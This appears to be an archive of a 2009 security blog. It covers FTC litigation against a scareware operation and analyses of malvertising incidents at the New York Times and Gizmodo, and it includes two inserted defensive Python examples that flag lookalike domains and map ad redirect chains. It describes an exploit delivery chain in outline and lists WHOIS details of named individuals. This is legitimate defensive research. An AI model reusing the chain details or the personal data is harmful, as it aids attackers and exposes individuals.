FTC versus Innovative Marketing et al - developments

As we know, Jain's legal counsel have applied for leave to withdraw as his attorneys of record. They have not yet been given permission to withdraw, and the deadline for Jain to respond to the FTC's renewed motion for sanctions was approaching, so Jain's counsel has filed a document in opposition to the renewed motion.

Jain's counsel claims that:

"Mr. Jain is not acting in bad faith, but on a well-justified fear that the FTC will attempt to circumvent and undermine his valid Fifth Amendment privilege against self-incrimination".

and

"Regarding deterrence, Mr. Jain is not guilty of a pattern of contumacious behavior; indeed, through counsel, he otherwise has actively participated in this case for almost one year."

and

"Finally, the FTC does not even address the possibility of lesser sanctions against Mr. Jain."

My immediate reaction, on reading the motion, was “come on, who are they trying to fool?” Let's not forget, when reading the above, that Jain's legal counsel claim in their motion for leave to withdraw that they have NEVER had direct contact with Jain, that they have had no indirect contact with him for more than 10 months, and that they have no idea where he is. Such silence does not equate to 'active' participation in my world.

Not surprisingly, the FTC's response has been swift and states, in part:

"Counsel’s description of Jain’s conduct bears no resemblance to the facts of this case. Jain – a fugitive for nearly a year now – has been toying with this Court and the FTC from the outset of this case. Jain has ignored the Temporary Restraining Order and Preliminary Injunction entered by this Court, and completely disregarded this Court’s most recent command that he appear for deposition."

and

"Jain has also wasted this Court’s time with a barrage of frivolous motions, which were designed solely to bog down this litigation and delay the FTC’s efforts to obtain redress on behalf of the millions of consumers Jain and his co-defendants have defrauded. Having succeeded in delaying this case for as long as possible, Jain has now disappeared, and left his lawyers behind to craft excuses for his egregious conduct."

It makes you wonder whether Jain's lawyers have received, or are going to receive, payment for their hard work over the past year, doesn't it? Here's hoping they received plenty of $$ in advance.

Posted by sandi with 1 comment(s)

FTC versus Innovative Marketing et al - Sam Jain's legal counsel request leave to withdraw as attorneys of record

In an unsurprising development, legal counsel for Sam Jain have petitioned the Court for permission to withdraw as attorneys for Sam Jain. The FTC does not oppose the request, but does object to any further extension of Mr Jain's time to respond to the FTC's pending Renewed Motion for Rule 37 Sanctions.

The reasons Jain's attorneys ask for permission to withdraw are:

  1. They have NEVER communicated directly with Jain.
  2. Their last indirect communication with Jain was received on January 14, 2009.
  3. They have not communicated with Jain in more than 10 months, since before the bench warrant was issued for Jain's arrest by the US District Court for the Northern District of California in an unrelated.
  4. They claim to have no knowledge of Jain's whereabouts, and to have no ability to contact him directly.

Jain's legal counsel state that "considering the bench warrant in the Northern District of California and the ongoing criminal investigation in the Northern District of Illinois, there is no indication Mr Jain will participate meaningfully in discovery, with or without counsel."

Posted by sandi with no comments

FTC versus Innovative Marketing et al - developments

Innovative Marketing and Daniel Sundin are still unrepresented.

09/16/2009
ORDER denying Motion of Marc D'Souza to Dismiss the Complaint. DIRECTING D'Souza to answer the complaint within 20 days. Signed by Judge Richard D Bennett on 9/16/09.

"Viewing the totality of the allegations through the lens of judicial experience and common sense, this Court finds that the FTC has clearly “plea{d} factual content that allows the court to draw the reasonable inference that the defendant is liable for the misconduct alleged.” Iqbal, 129 S. Ct. at 1949 (citing Twombly, 550 U.S. at 50). Through its extensive factual pleadings, the FTC has positioned its claims against Marc D’Souza safely within the realm of plausibility."


10/02/2009
MEMORANDUM ORDER granting Motion for Sanctions against Sam Jain insofar as certain conditions are imposed.

“The FTC’s Motion for Rule 37 Sanctions against Defendant Sam Jain (Paper No. 131) is GRANTED insofar as the following conditions are hereby imposed:

“1. the FTC is instructed to re-notice Jain’s deposition for an agreed upon time within the next thirty days of the date hereof;
2. Jain shall again be offered the opportunity to be deposed by video-conference from a location of his choosing;
3. Jain is hereby warned that if he fails to attend this upcoming deposition, this Court will consider imposing a default judgment against him pursuant to Federal Rule of Civil Procedure 37(d).”


10/06/2009
ANSWER to FTC Complaint (document 1), by Marc D'Souza

A few minor admissions, lots of denials, a claim that "the FTC has authority to seek restitution, consumer redress or disgorgement with respect to conduct that took place outside the United States and that does not affect domestic commerce", and lots of declining to answer under the Fifth Amendment (while at the same time requesting that said refusal be treated as a denial).


10/22/2009
Second MOTION for Sanctions Pursuant to Rule 37 Against Sam Jain by Federal Trade Commission. Responses due by 11/9/2009

"Sam Jain has made a mockery of this proceeding and has demonstrated nothing but contempt for this Court and the American judicial system as a whole. Together with his codefendants, Jain perpetrated one of the largest online frauds ever prosecuted by the FTC, with a total consumer injury figure that – as the Court will soon hear – exceeds $150 million. After being caught red-handed by the FTC, Jain promptly fled the United States, leaving his lawyers behind to delay the FTC’s efforts to redress the massive consumer injury Jain helped inflict. After nearly a year of delay, Jain has reached the end of the road. Unwilling to comply with this Court’s command that he participate in discovery, Jain has no further ability to stall this litigation. As a result, Jain has washed his hands of this matter, and simply disappeared. Given these facts, it is difficult to imagine a case that better supports the imposition of terminating sanctions, or an individual more deserving of such an outcome than Jain."


11/02/2009
MOTION for Extension of Time to File Response/Reply as to Second MOTION for Sanctions Pursuant to Rule 37 Against Sam Jain by Sam Jain. Responses due by 11/19/2009 (unopposed)

"Mr. Jain respectfully submits that good cause for granting this Motion exists: (1) Mr. Jain has not requested or received from the Court an extension on any other response or reply filed in this case; (2) Logistical obstacles and the important factual and legal issues raised by the FTC’s Renewed Motion necessitate a brief extension of time to respond."


11/03/2009
Paperless ORDER granting Defendant Jain's unopposed Motion for Extension of Time. Response to Second Motion for Sanctions due 11/16/2009

Posted by sandi with no comments

Ponderings about the incident that hit Gizmodo (courtesy of Gawker)

While I was on holidays, a malvertizing incident hit Gizmodo (via advertising sold to Gawker).  The miscreants impersonated the legitimate advertising agency Spark Communications, registering the domain spark-smg.com (the real domain is sparksmg.com) to assist in the impersonation.

Publicis have since taken over the fraudulent domain spark-smg.com but we still have access to historical information about the domain which is interesting.

Before we get into the nitty gritty of the domain itself, I have a few observations to make.  In short, the tricks used were not new.

"Gawker Sales Guy" says on the businessinsider.com web site that:

"The reason this is news (and the reason we sent it here in the first place) is because these guys were so thorough they managed to fool multiple levels of safeguards we have in place to keep this thing from happening. There was literally NO way for us to know, short of calling the agency and doing background checks on everyone we work with."

Why did nobody notice that the domain spark-smg.com was being used, instead of sparksmg.com? I concede that the difference between the domains is subtle, but even if the "Gawker Sales Guy" who was corresponding with the miscreants did not notice the subtle difference in domains at first, I would have expected him to take a closer look when one of his emails bounced on Saturday 28 September.

The realities of malvertizing *are* well known in the industry nowadays, thanks to all of the publicity that it has received over the past year or so.  Many warnings have been sent out by various parties and there have been many high profile incidents.  The new person approaching Gawker, the bounced email, and the wide variation in time of day when emails were received should have all given the Gawker Sales Guy reason to pause and take a closer look (despite the fraudster claiming, in one email, to be in London).  "Background checks" should be standard operating procedure, and "calling the agency" using their main telephone number (not a direct line) should also be standard operating procedure, even after background checks have been completed, whenever a new name appears.

Gawker Sales Guy (http://www.businessinsider.com/henry-blodget-gawker-scammed-by-malware-pretending-to-be-suzuki-2009-10#comment-4ae6561900000000008b1b70) then goes on to say:

"This was truly damn near impossible to spot as a fake."

This claim is impossible to judge without specific technical information.  That being said, the ads have to touch something bad as part of the malvertizement process, even if the malicious behaviour itself does not trigger.

On the BBC web site (http://news.bbc.co.uk/2/hi/technology/8328399.stm) it states:

"Blaming the fact that staff used Linux operating systems on their production machines for "not noticing sooner", it advised concerned users to load some up-to-date antivirus software and "make sure your system is clean"."

The fact that staff use Linux on their production machines is not why the staff did not see the malvertizements.  As regular readers of this blog know, the miscreants behind malvertizing actively manage their campaigns, deliberately doing all they can to avoid detection by victim web sites via geo-targeting, IP exclusions and whatnot.  I would be *extremely* surprised if the malicious behaviour would have been triggered if the malvertizement was displayed on a computer within an IP range associated with the victim web site, or the infrastructure used to serve the advertisement, even if it were running an old, vulnerable, version of Windows.  The bad guys are not fools – they are not going to allow malicious behaviour to trigger on a computer known to be owned by the very people they are trying to fool and defraud.

Online Media Daily (http://www.mediapost.com/publications/?fa=Articles.showArticle&art_aid=116269) states that it "is believed to be the first to successfully mimic the identity of a major advertising agency".

Ok, I suppose we can argue about what a "major" advertising agency is, but it certainly is not the first time an advertising agency has been spoofed (or the first time that the bad guys have made preparations to do just that).  Some malicious domains that I have seen, and reported on in the past, that could be used to spoof legitimate ad networks include:

byronadvertising.eu (used to impersonate the legitimate byronadvertising.com and byronadvertising.co.uk)
koeppelinteractive.co.uk (impersonating koeppelinteractive.com, redirecting visitors to that domain)
quigley-simpson.net (impersonating quigleysimpson.com, redirecting visitors to that domain)
mediavest-corp.com (WHOIS referred to support@us-resources.com, an email address also used with the legitimate mediavest.net)
posnerpromotion.com (impersonating posneradv.com, redirecting visitors to that domain)
adconion-inc.com (impersonating adconion.com, redirecting visitors to that domain)
carat-inc.com (impersonating carat.com, redirecting visitors to that domain)
pubmatic-inc.com (impersonating pubmatic.com, redirecting visitors to that domain)
doubleclick-ssl.com (impersonating Doubleclick)


Then there are the fake sites pretending to sell advertising directly on behalf of large corporations:

nokia-corp.com (shared IP with lacoste-ads for a while - can be assumed to impersonate Nokia)
foxinteractivemedia-inc.com (impersonating fox.com, redirecting visitors to that domain)
lacoste-ads.com (impersonating lacoste.com, redirecting visitors to that domain)
orangeadvertising-inc.com (impersonating orange.com, redirecting visitors to that domain)
hyundai-inc.com (impersonating hyundai-motor.com, redirecting visitors to that domain)
singlesnet-inc.com (impersonating singlesnet.com, redirecting visitors to that domain)
vonage-inc.com (used to impersonate the real Vonage)

Tribalfusion has even been impersonated in a credit reference.


Anyway, let's take a look at spark-smg.com and see what danger signs we can find by examining historical data (taken from before Publicis Groupe S.A. took over the domain). 

spark-smg.com
ICANN Registrar: BIZCN.COM (a known problem Registrar)
Created 4 September 2009 (a very new domain, another bad sign)

IP address (up until on or about 3 October 2009): 212.117.175.6

212.117.175.6 = Luxembourg Root Esolutions (another problematic host, too often seen in association with malvertizing).


Note:  A check of the IP range 212.117.175.% reveals a few domains associated with advertising that should be treated with caution:

RevolteChMedia.com (claims to have been around since 2004, but the domain was only registered on 13 October 2009 - ICANN Registrar BIZCN.COM, INC)

BellWayInteractive.com (registered on 14 September 2009 - ICANN Registrar BIZCN.COM, INC)

SmartMediaWay.com (registered 14 September 2009 - ICANN Registrar BIZCN.COM, INC)

GoldBayMedia.com (registered 14 September 2009 - ICANN Registrar BIZCN.COM, INC)
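The danger signs listed above (a near-miss of a real agency domain, a domain only weeks old, a distrusted registrar and hosting range) can be turned into a routine check that a sales desk runs on every new advertiser contact. The following is an added example written for this post, not code from the blog or from any company named here; the partner list, watchlists and first-contact date are assumed sample data, and the creation date, registrar and IP for spark-smg.com are the values given in the post.

```python
"""Flag an advertiser-contact domain that imitates a known partner's domain.

Added example, not code from the Spyware Sucks blog or from any company named
in the post. It checks the danger signs the post lists for spark-smg.com:
a near-miss of a legitimate agency domain, a domain created only weeks before
first contact, and a registrar or hosting range the reader already distrusts.
The watchlists, creation dates and IPs below are sample data typed in by hand
from the post, not live WHOIS output.
"""
from __future__ import annotations

from datetime import date
from typing import Iterable, Optional

# Suffix tokens the post shows being bolted onto real brand names (x-inc.com, x-ads.com ...).
DECOY_TOKENS = ("inc", "corp", "ads", "ssl")

# Constructed watchlists; a real deployment would load these from configuration.
DISTRUSTED_REGISTRARS = {"BIZCN.COM, INC"}
DISTRUSTED_IP_PREFIXES = ("212.117.175.", "212.117.166.")


def registrable_label(domain: str) -> str:
    """Return the label just below the public suffix: 'spark-smg.com' -> 'spark-smg'."""
    parts = domain.lower().strip(".").split(".")
    # Good enough for the two-label suffixes seen in the post (.co.uk); not a full PSL lookup.
    if len(parts) >= 3 and parts[-2] in {"co", "com", "net", "org"}:
        return parts[-3]
    return parts[-2] if len(parts) >= 2 else parts[0]


def normalise(label: str) -> str:
    """Drop hyphens and trailing decoy tokens: 'carat-inc' -> 'carat', 'spark-smg' -> 'sparksmg'."""
    tokens = [t for t in label.split("-") if t]
    while len(tokens) > 1 and tokens[-1] in DECOY_TOKENS:
        tokens.pop()
    return "".join(tokens)


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance; labels are short, so the O(n*m) table is fine."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike_of(domain: str, partners: Iterable[str]) -> Optional[str]:
    """Return the partner domain `domain` imitates, or None if it is the genuine domain or unrelated."""
    partners = [p.lower() for p in partners]
    if domain.lower() in partners:
        return None
    candidate = normalise(registrable_label(domain))
    for partner in partners:
        if edit_distance(candidate, normalise(registrable_label(partner))) <= 1:
            return partner
    return None


def danger_signs(domain: str, partners: Iterable[str], created: date, registrar: str,
                 ip: str, first_contact: date) -> list[str]:
    """Collect the warning signs a sales desk should resolve before accepting the order."""
    signs = []
    target = lookalike_of(domain, partners)
    if target:
        signs.append(f"{domain} looks like {target}")
    age_days = (first_contact - created).days
    if age_days < 90:
        signs.append(f"domain was only {age_days} days old at first contact")
    if registrar.upper() in DISTRUSTED_REGISTRARS:
        signs.append(f"registrar {registrar} is on the watchlist")
    if ip.startswith(DISTRUSTED_IP_PREFIXES):
        signs.append(f"hosted at {ip}, inside a distrusted range")
    return signs


if __name__ == "__main__":
    partners = ["sparksmg.com", "carat.com", "pubmatic.com", "adconion.com"]
    # Creation date, registrar and IP are the values the post gives for spark-smg.com;
    # the first-contact date is assumed.
    for sign in danger_signs("spark-smg.com", partners, date(2009, 9, 4),
                             "BIZCN.COM, INC", "212.117.175.6", date(2009, 9, 25)):
        print("-", sign)
```

The same normalisation catches the "-inc" and "-ads" decoys listed earlier in the post (carat-inc.com, pubmatic-inc.com), which is why the check strips those tokens before comparing.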

Posted by sandi with no comments

Six countries, and 3 weeks, later I am back from holidays

After exploring the northern hemisphere of our amazing planet and visiting climates as varied as 41 degrees (Celsius) in Egypt and –2 degrees (Celsius) in an ice grotto situated at 3,000 feet above sea level in Switzerland, and flying over the Ukraine at roughly 11,000 feet (yes, malvertizing did cross my mind when I saw where the plane was situated) I am back on duty and ready to resume keeping all of you informed about the latest happenings in the malvertizing world.

My apologies for not letting my loyal readers know that I would be absent; for obvious reasons I prefer NOT to advertise publicly that I will be away for an extended period until after I return.

If anybody is interested in photos, I took 600 (and some of them are even pretty good) … :-)

Posted by sandi with 4 comment(s)

And the winner is…


Better… much better…


Poll results

Posted by sandi with no comments

Would you like to help choose the new Vegemite name?

Kraft have bowed to public pressure, and have scrapped the (dare I say loathed) Vegemite name “iSnack 2.0”.

And, they have decided that the public will choose the new name, by voting on it.

Here is the URL if you’re so inclined:
http://www.ys2.net.au/surveys/9/y90926.asp

There are six names to choose from, and sadly you will have to rate them from your first choice, to your last choice.  The choices are:

Vegemite Cheesybite, Vegemite Vegemate, Vegemite Snackmate, Vegemite Smooth, Vegemite Vegemild and Vegemite Creamymate

Polling starts at 5pm (AEST) on Friday 2 October 2009 and ends at 12 noon (AEDST) on Monday 5 October 2009.

Posted by sandi with no comments

I have received the Microsoft MVP Award – for the 11th time


I received an email today advising me that I have been awarded Microsoft MVP status for the 11th time.

Unlike my previous 10 awards, this time I have been awarded Microsoft MVP under the specialty “Consumer Security: Training” instead of as an Internet Explorer MVP.  I think that is perfectly appropriate; for years I have focused on Consumer Security from the perspective of an Internet Explorer user, but in recent years my focus has moved to studying malvertizing – what it is, how it works, and who is behind it – and, most importantly, sharing and passing on that knowledge and advising advertising networks and web site owners on how to best avoid the miscreants behind malicious advertising.

Avoiding the bad guys is NOT easy, and is getting harder all the time. As the Internet community as a whole has become more aware, and as people such as myself have put so much time and effort into educating the community, the bad guys have had to match our efforts and become sneakier. The impersonation of legitimate companies has become more common; malicious SWF advertisements seem to be falling out of favor as we get better at detecting them, and the bad guys no longer dump all of their eggs in the one basket.

The most important thing that any of us can do is complete comprehensive reputational research and background checks into any new advertiser/partner/client.  And, don’t take what is on those credit reference forms at face value.  Double check that the phone number supplied for the credit reference matches the company that he or she claims to work for.  If approached by a well known company, make sure that the domain being used actually belongs to that company.

If you are approached by a well known company, put the attraction of money aside and ask yourself why they would want to advertise with you, and be honest with yourself in your answers.  Do you attract enough traffic to make it worth their while? Are you well known enough? Is your target audience appropriate to what they are selling?  Is there a sense of urgency to the sale? Are they contacting you at unusual times of the day or night?  Are they reluctant to speak by telephone?  Does an answering machine pick up too often?

A good reputation is hard won, and easily lost, and the negative press caused by a malvertizing incident does not go away.  Your web site may be blocked by the various web reputation services that are available nowadays.  Google may block access to your site via web searches.  Eventually there may be a noticeable reduction in advertising income if your visitors take it upon themselves to block all advertising for their own protection, or they may become angry or frustrated and stop visiting at all, especially if there is more than one malvertizing incident.

Finally – train your staff. Make www.anti-malvertising.com required reading and DO WHAT IS SUGGESTED.  If, despite your best efforts, you receive reports of problems from your visitors, DO NOT assume that your visitor is blaming you unfairly, or that there may be a problem with their computer.  Take *all* reports seriously, and ASK FOR HELP.  It is unlikely that your visitors will be sophisticated enough to be able to gather the evidence you need on their own, and the bad guys are very good at hiding their activities from you using various tricks.

And keep reading this blog :)

Posted by sandi with 5 comment(s)

Waiting for an Apple lawsuit….


… or maybe a lawsuit by the makers of “iSnack Cyber Chips” or the “iSnack Energy Bar”.

Yes, Kraft really did choose to name their new Vegemite “iSnack 2.0”. The name was “invented” (and I use that term very loosely) by Dean Robbins, a 27 year old West Australian graphic and web designer.

What were Kraft thinking…

So far, the responses I am seeing are overwhelmingly negative, and you can add me to the list of critics.

Posted by sandi with no comments

ALERT: Please treat content from extrabanner.com with extreme caution


Regular readers will recognize the domains t.banner09092.com and blackwater-cuprumworks.net – they were the domains used to attempt infection of computers via various security exploits:
http://msmvps.com/blogs/spywaresucks/archive/2009/09/12/1722754.aspx

Luckily, the domain blackwater-cuprumworks.net is not responding at the moment.

extrabanner.com
ICANN Registrar: Godaddy.com, Inc
Created 30 July 2009
NS47.DOMAINCONTROL.COM
NS48.DOMAINCONTROL.COM

IP: 68.178.232.100 - Arizona, Scottsdale, Godaddy.com, Inc (shares IP with 11,081,675 other sites)

Registrant:
Domain Owner (trafficbuyer@gmail.com - the same as pussbanner769.info)
15156 SW 5th
Scottsdale, Arizona 85260
US

*****

dullnessfrequenting.info
ICANN Registrar: Godaddy.com, Inc
Created 17 September 2009
NS57.DOMAINCONTROL.COM
NS58.DOMAINCONTROL.COM

IP: 68.178.232.100 - same as extrabanner.com

Registrant:
Domain Owner (trafficbuyer@gmail.com)
15156 SW 5th
Scottsdale, Arizona 85260
US

*****

t.banner09092.com
ICANN Registrar: Godaddy.com, Inc
Created 18 September 2009
NS57.DOMAINCONTROL.COM
NS58.DOMAINCONTROL.COM

IP: 68.178.232.100 (again)

Registrant:
Domain Owner (trafficbuyer@gmail.com)
15156 SW 5th
Scottsdale, Arizona 85260
US

*****

blackwater-cuprumworks.net
ICANN Registrar: DIRECTI (Registration service "Domain Names Registrar Reg.Ru Ltd")
Created 7 September 2009
NS1.EVERYDNS.NET
NS2.EVERYDNS.NET

IP: 213.155.2.112 - Namibia, Grinvich3, Vladimir Gubarenko

Shares IP with the domains amateursex-hert.com, aw-work.net, awirons-work.com, blackwater-ironworks.com, blackwater-ironworks.net, blackwater-metalworks.net, blackwater-metalworks.net, sexamateur-hartcore.com and sleazy-dreamers.net

Registrant:
Eduard Skobelev (eddiscobbi3@gmail.com)
ul. Starinskaya, d.1, kv. 92
g. Moskva
g. Moskva, 107009
RU
Tel: +7 4952243948

Posted by sandi with no comments

Added to the “the Victorian Police are looking for WHAT???” file


SOS issued for original ABBA jumpsuit

“VICTORIA Police have issued an SOS to help find a white jumpsuit originally worn by ABBA songstress Agnetha Faltskog.

The jumpsuit, which Agnetha is pictured wearing on the cover of the Swedish pop group's fourth album, Arrival, is believed to have been taken from a Melbourne house and sold at a garage sale.

The jumpsuit's owner had leased out the Healesville home with the 1970s jumpsuit still stored in the shed.

Police believe the figure-hugging suit may have been sold by the tenants in a garage sale.

The tenants will be interviewed by police, a Victoria Police spokeswoman said.

Police would like to speak to anyone who may have attended a garage sale at the Don Road property in May this year.”

Source: http://www.news.com.au/story/0,27574,26087496-29277,00.html

(Yes, I know, the graphic I have used is not from the actual “Arrival” album’s front cover, but it does show the jumpsuit properly) ;o)

Posted by sandi with no comments

Ponderings about the New York Times malvertizing incident

It has been all over the popular press – the New York Times web site had been tricked into accepting a malvertizement that was hijacking some visitors to that site and dumping them at a web site touting fake security software.  And, in a move that is kind of unusual, the New York Times web site displayed a warning about the malvertizement.

It just so happens that over on yort.com (author: Troy Davis) there is a screenshot demonstrating how the hijack was triggered:

 

New York Times incident as reported on yort.com

Similar incident as reported on Spyware Sucks


As you can see from the screenshots above, the two incidents are very similar, and the important stuff – the stuff that caused the hijack – is the code starting at “var a1” in both screenshots.  Depending on various conditions and controls (geolocation, IP address, time of day etc) some visitors would have received JUST the advertisement – others would have seen **the same advertisement** but would have also received the extra code (as pointed out above, starting at var a1).

What we know about the hijacking domain, tradenton.com:

  • it sat at a known bad IP address (as reported on this blog on the 10th of September)
  • other bad domains were discovered in the same IP range as far back as 4 September
  • it was very new (registered just this month)
  • it was registered using a known problematic Registrar

I have said many times on this blog and elsewhere that reputational checks are of CRITICAL IMPORTANCE when accepting advertisements.  Information was available to warn those alert to potential danger that caution was needed as far back as the 4th of September (cite: my alert about vonage-inc.com on 4 September 2009).

Please… take advantage of services such as http://www.anti-malvertising.com/ and start conducting in-depth research when somebody tries to sell you advertising. One day, your web site may not be hit by an advertisement that simply redirects your visitors to a fake security website. Instead, your visitors may be redirected to:

The New York Times hijack in progress, as captured and reported by yort.com…

I have been reading the report at wired.com about this incident, and think it is worthwhile pondering some of the points made in the article.


wired.com: “The move comes after a security loophole allowed scammers over the weekend to swap an innocuous advertisement for one serving a fake virus-warning, and hawking a deceptive scareware product intended to sell bogus security software.”

wired.com: “Over the weekend, the ad being served up was switched so that an intrusive message, claiming to be a virus warning from the reader’s computer, appeared.”

wired.com are correct when they say that the incident occurred because of a “security loophole” (that is, the New York Times allowed content to be displayed on its web site that was hosted remotely by a domain outside of their direct command and control – an extremely common practice and certainly not peculiar to the New York Times).

That being said, I find it interesting that an “innocuous advertisement” would be “swapped out” or “switched”.  Standard modus operandi for incidents such as the one caught by yort.com has always been to simply add additional malicious code when certain conditions were met – the advertisement itself has not changed in previous incidents (except for when there is an industry-standard rotation of advertisements, which is not the same as a deliberate swapping out). 

wired.com: “Readers who clicked on the ad found their browsers hijacked while a fake virus-scan was displayed. If they allowed the malicous (sic) website to serve its executable payload, they’d be stuck with a fake scareware program that badgers them into buying supposed anti-virus software.”

Wrong.  No user interaction is required for the hijack to occur.  Nobody needed to click on anything.

Also, as evidenced by the yort.com report, if a person was not hijacked (and therefore had the opportunity to click on the advertisement), then they were redirected to a legitimate website (in the yort.com example, the BVLGARI advertisement was linked to the URL http://www.bulgari.com/main.php?lang=6/ref=680).

bulgari.com
ICANN Registrar: GROUP NBT PLC AKA NETNAMES
Created 17 February 1998
AUTH200.NS.UU.NET
AUTH210.NS.UU.NET
NS.BULGARI.COM

Registrant:
Bulgari SpA
Lungotevere Marzio 11
Roma
00186
IT


wired.com: “The Times declined to identify the “national advertiser” the scammers originally impersonated.”

Again, let’s refer to yort.com. From that article I can retrieve the URL of the advertisement used – you can see it to the left of the screen (I should warn you that there *may* have been more than one advertisement being supplied by the miscreants – we should not assume that this was the only advertisement that a victim may have seen).

The author also writes:

“A comment gave the campaign ID as Vonage01_1163613_nyt12, though it was obviously unrelated to Vonage.”

I wonder if the domain vonage-inc.com was used by whoever it was that sold the malvertizing to the New York Times. vonage-inc.com used to have the IP address 212.117.166.71, and was known to be used by cybercriminals to impersonate the real Vonage. Thankfully, vonage-inc.com seems to have been handed over to the *real* Vonage on or about 5 September.

I wrote about vonage-inc.com back on 4 September 2009.

Edit: I see that the New York Times has admitted that Vonage was impersonated:

“The creator of the malicious ads posed as Vonage, the Internet telephone company, and persuaded NYTimes.com to run ads that initially appeared as real ads for Vonage. At some point, possibly late Friday, the campaign switched to displaying the virus warnings.

Because The Times thought the campaign came straight from Vonage, which has advertised on the site before, it allowed the advertiser to use an outside vendor that it had not vetted to actually deliver the ads, Ms. McNulty said. That allowed the switch to take place. “In the future, we will not allow any advertiser to use unfamiliar third-party vendors,” she said.”

Just to repeat what I said above, information was available on the net, warning that Vonage was being impersonated, as far back as 4 September.

So, what do we know about the domains implicated in this latest incident?

tradenton.com
ICANN Registrar: BIZCN.COM, INC
Created 2 September 2009
NS1.EVERYDNS.NET
NS2.EVERYDNS.NET

IP: 212.117.166.69 - Luxembourg, Root Esolutions (a known bad IP address – also, note how close the IP address is to what used to be the IP address for vonage-inc.com)

Currently shares IP with harlingens.com, kennedales.com, newadsresults.com, relunas.com and waveadvert.com

Registrant:
Tradenton
Shawn Brownell (shawn@tradenton.com)
978-214-3972 fax: 978-214-3972
3051 Pearlman Avenue
Wilmington MA 01887
US

*****

harlingens.com
ICANN Registrar: BIZCN.COM, INC
Created 2 September 2009
NS1.EVERYDNS.NET
NS2.EVERYDNS.NET

Registrant:
harlingens.com
Richard Andrew (admin@harlingens.com)
956-893-2463 fax: 956-893-2463
4859 Carolina Avenue
Harlingen TEX 78550

*****

sex-and-the-city.cn
ICANN Registrar: Chinese
Created 3 September 2009
NS1.EVERYDNS.NET
NS2.EVERYDNS.NET

IP: 94.102.48.209 - Noord-holland, Amsterdam, As29073 Ecatel Ltd

Registrant: oregon.artscomm@state.or.us

*****

Finally, yort.com mentions adxbigad - I have found several references to adxbigad in scripts designed to remove advertising from the New York Times web site (cite: http://userscripts.org/scripts/review/56684)

Posted by sandi with no comments

ALERT: Please treat content from trendbanner.com with extreme caution


It has been implicated in the facilitation of malvertizing that attempts to infect computers via a PDF exploit.

The way it works is as follows:

ad.trendbanner.com uses document.write to load the JS content at banner.pushbanner769.info

banner.pushbanner769.info displays an advertisement, but also loads content from t.banner08092.com.

t.banner08092.com simply redirects to blackwater-cuprumworks.net

blackwater-cuprumworks.net includes a JavaScript file (valla.js) which loads content from bintus-bahi.cn in a 0x0 iframe.

bintus-bahi.cn uses CVE-2009-0927 (Stack-based buffer overflow in Adobe Reader and Acrobat via the getIcon method of a Collab object) to infect vulnerable computers, as well as downloading other malware.

The SWF (oneComesEthics.swf) is suspected to be malicious.
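The chain above is exactly the kind of evidence a publisher can gather for themselves by capturing what an ad tag actually loads, rather than trusting what the seller declared. The following is an added example written for this post (not code from the blog or from any of the sites named): it walks a constructed capture modelled on the hops described above, reconstructs the host chain, and flags the document.write script loads, the redirect, the 0x0 iframe, and every host outside the set the advertiser declared. The response bodies are invented stand-ins, not the real files, and the "declared hosts" set is an assumption for the example; it also illustrates the point made in the New York Times post that the visible advertisement stays intact while the extra code rides alongside it.

```python
"""Reconstruct a malvertising hop chain from captured responses and flag why it fails review.

Added example, not code from the blog or from any site it names. The capture below
is constructed to mirror the chain the post describes (ad.trendbanner.com ->
banner.pushbanner769.info -> t.banner08092.com -> blackwater-cuprumworks.net ->
bintus-bahi.cn); the bodies are invented stand-ins, not the real files. The set of
hosts the advertiser "declared" is an assumption for the example.
"""
import re
from urllib.parse import urlparse

# Constructed capture: (requested URL, HTTP status, Location header or None, response body).
CAPTURE = [
    ("http://ad.trendbanner.com/show.js", 200, None,
     "document.write('<script src=\"http://banner.pushbanner769.info/b.js\"></script>');"),
    ("http://banner.pushbanner769.info/b.js", 200, None,
     "document.write('<img src=\"http://banner.pushbanner769.info/ad.gif\">');"
     "document.write('<script src=\"http://t.banner08092.com/t.js\"></script>');"),
    ("http://t.banner08092.com/t.js", 302, "http://blackwater-cuprumworks.net/valla.js", ""),
    ("http://blackwater-cuprumworks.net/valla.js", 200, None,
     "document.write('<iframe src=\"http://bintus-bahi.cn/in.php\" width=\"0\" height=\"0\"></iframe>');"),
    ("http://bintus-bahi.cn/in.php", 200, None,
     "<html><embed src=\"oneComesEthics.swf\"><script>/* exploit code not reproduced */</script></html>"),
]

# Hosts the advertiser told the publisher it would serve from (assumed for the example).
DECLARED_HOSTS = {"ad.trendbanner.com", "banner.pushbanner769.info"}

TAG_RE = re.compile(r'<(script|iframe|img|embed)\b[^>]*?\bsrc="([^"]+)"[^>]*>', re.I)
DIM_RE = re.compile(r'\b(width|height)="?(\d+)', re.I)


def host_of(url: str) -> str:
    return (urlparse(url).hostname or "").lower()


def extract_loads(body: str) -> list:
    """Every resource a body pulls in, with a flag for the 0x0 iframe trick the post describes."""
    loads = []
    for m in TAG_RE.finditer(body):
        tag, src = m.group(1).lower(), m.group(2)
        # Only attribute-based sizing is checked; CSS-hidden frames would need a DOM renderer.
        dims = {k.lower(): int(v) for k, v in DIM_RE.findall(m.group(0))}
        hidden = tag == "iframe" and dims.get("width") == 0 and dims.get("height") == 0
        loads.append({"tag": tag, "src": src, "hidden_iframe": hidden,
                      "via_document_write": "document.write" in body})
    return loads


def analyse(capture, declared_hosts) -> dict:
    """Order the hosts touched and list each hop that should have stopped the creative in review."""
    chain, findings = [], []
    for url, status, location, body in capture:
        host = host_of(url)
        if not chain or chain[-1] != host:
            chain.append(host)
        if status in (301, 302, 303, 307) and location:
            findings.append(f"{host} redirects to {host_of(location)}")
        for load in extract_loads(body):
            target = host_of(load["src"]) or host   # relative src stays on the same host
            if load["hidden_iframe"]:
                findings.append(f"{host} injects a 0x0 iframe pointing at {target}")
            if target != host and target not in declared_hosts:
                how = " via document.write" if load["via_document_write"] else ""
                findings.append(f"{host} loads a {load['tag']} from undeclared {target}{how}")
    return {"chain": chain,
            "undeclared_hosts": [h for h in chain if h not in declared_hosts],
            "findings": findings}


if __name__ == "__main__":
    report = analyse(CAPTURE, DECLARED_HOSTS)
    print(" -> ".join(report["chain"]))
    for finding in report["findings"]:
        print("!", finding)
```

Because the bad guys condition the extra code on geolocation, IP range and time of day, a capture taken from the publisher's own network may show only the clean first two hops; the check is only as good as the vantage point the capture was taken from.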

Virustotal analysis of some content received via bintus-bahi.cn:

